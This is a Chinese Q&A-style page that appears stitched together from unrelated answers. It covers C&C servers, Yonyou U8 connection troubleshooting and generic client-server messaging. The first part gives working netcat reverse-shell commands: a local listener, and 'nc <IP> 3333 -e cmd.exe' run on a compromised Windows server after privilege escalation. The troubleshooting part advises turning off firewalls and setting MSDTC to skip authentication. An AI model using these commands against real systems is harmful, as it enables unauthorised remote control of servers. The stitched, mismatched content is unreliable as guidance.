什么是C&C服务器

C&C

服务器的全称是

Command

and

Control

Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个

webshell

的时候，需要对服务器进行提权操作，如果是一台

windows

的服务器，提权的时候通常是利用本地提权漏洞的

exp

进行溢出提权，有些

exp

可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的

exp

溢出成功之后是返回一个

system

权限的

cmd，这时就需要将低权限的

cmd

shell

反弹回本地，这里用

nc

在本地执行：nc

-vv

-lp

3333

上述命令的意思是在本地监听一个

3333

端口等待连接，假设电脑

IP

是公网的，并且

IP

为

114.114.114.114，然后在目标服务器就可以执行：nc

114.114.114.114

3333

-e

cmd.exe

上面的命令就可以把远程服务器的服务器权限的

cmd

shell

返回到本地，这时你就可以通过

nc

建立的这个

shell

进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的

C&C

服务器。

扩展资料：

C&C

服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网

IP

地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网

IP

的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

首先你的软件单机版还是网络版。一般这种情况网络版出的问题比较多。

1、单机版 在服务器重新选择一下本机的计算机名，或是输入本机的IP 127.0.0.1。看一下登陆界面 服务器位置 输入127.0.0.1 试试看。

2、网络版 检查步骤：

1.网络是否通？

方法：ping 服务器名称/ip -t

如果网络不通，就让用户查找网络原因；

如果网络是通的，继续……

2.尝试使用ip地址登录服务器

如果无效，继续……

3.修改hosts文件，将服务器+ip加入（路径：C:\WINNT\system32\drivers\etc\hosts）

如果配置hosts文件无效，网络解析失效，将应用服务器配置（开始-程序-用友ERP-U8-系统服务-应用服务器配置）中的数据服务器改为IP地址，工作站改为IP登录；

如果依然无效，继续……

4.是否跨网段，若是，在ip高级选项中“wins”设置中将服务器的ip添加进去。

5.查看服务器的ip设置是静态ip还是自动获取？

若是自动获取，则要求用户改成静态ip；

6.是否多网卡，若是，禁用其中一个。

7.端口是否畅通？

方法：telnet 服务器名/ip 端口号（sqlsever 1433、ufsoft 4630、web 80）

8.有防火墙？winxp、win2003的自带防火墙，或者商用防火墙软件

方法：关闭防火墙

若客户不愿关闭，则设置防火墙，开放1433，4630，80端口

9.无防火墙？经过telnet测试，1433不通(4630是通的)，导致软件无法连接数据库的情况

方法：A、若是win2003，则检查sql server是否安装了sp3补丁，没有安装补丁的话1433端口是无法开通的；（如果确实安装了补丁，则参考下面的方案）

B、如果确实安装了补丁，则参考下面的方案：对于winxp、win2003，由于windows的msdtc安全设置的原因，也会导致1433不通。处理方法：进入windows管理工具下面的组件服务，然后“组件服务－电脑－我的电脑－右键属性－远程－安全设置”将“安全设置”中的“允许远程客户端”、“允许远程控制”“允许出站”“允许入站”“不进行验证”等全部设置上。然后1433就可以通了。

上面的方法基本上能把问题解决。

嗯一般来说需要2个东西

一个是服务器端(发起者)

一个是客户端(接收者)

然后服务器端发出命令

客户端接收,然后解析命令并执行,然后返回一个结果

或者相反

总之,你只能这样

要么遵守协议收发消息,要不自己建立自己的通讯

---